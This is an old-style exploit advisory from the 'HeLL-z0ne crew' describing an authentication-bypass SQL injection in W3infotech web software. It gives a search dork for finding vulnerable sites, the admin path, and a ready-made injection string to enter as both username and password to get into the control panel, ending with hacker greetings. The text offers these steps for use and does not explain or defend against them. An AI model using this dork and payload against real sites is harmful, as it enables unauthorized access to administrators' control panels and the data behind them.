36 lines
No EOL
1.8 KiB
Text
36 lines
No EOL
1.8 KiB
Text
[*]##############################################
|
|
[+] |____ViRuS_HiMa@YouR SyS__|__\ #
|
|
[+] |______________________|___||\*___ #
|
|
[+] |______________________|___||""|"*\___, #
|
|
[+] |______________________|___||""|*"|___|| #
|
|
[+] "([ (@)''(@)""""""(|*(@)(@)********(@)* #
|
|
[+]====================================================================||
|
|
[*] About : W3infotech ( Auth Bypass ) SQL injection Vulnerability ||
|
|
[!] Site : http://www.w3infotech.com ||
|
|
[!] Author : ViRuS_HiMa ||
|
|
[!] Site : wWw.HeLL-z0ne.org ||
|
|
[!] E-Mail : eGypT_GoVeRnMenT[at]HoTmaiL[dot]CoM ||
|
|
[!] Location : Cairo-007 ||
|
|
[!]====================================================================||
|
|
[!] [H]eL[L] [Z]on[E] [C]re[W] ||
|
|
[!]====================================================================||
|
|
[!]
|
|
[!] Exploitation : ||
|
|
[!]
|
|
[!] you can use this dork : "Powered By W3infotech" ||
|
|
[!]
|
|
[!] Just add the admin path ,, so it will be : ||
|
|
[!]
|
|
[!] http://server/admin ||
|
|
[!]
|
|
[!] then auth bypass using this password : ||
|
|
[!]
|
|
[!] hima' or 'a'='a ||
|
|
[!]
|
|
[!] it mean that you have to type the same code in user and pass ||
|
|
[!]
|
|
[!] what you got ?? ,, you are in the script control panel now :p ||
|
|
[!]
|
|
[!]====================================================================||
|
|
[!] Greetz : Haxker & explit007 & Kasper-Ksa & All My Friends . ||
|
|
[*]====================================================================|| |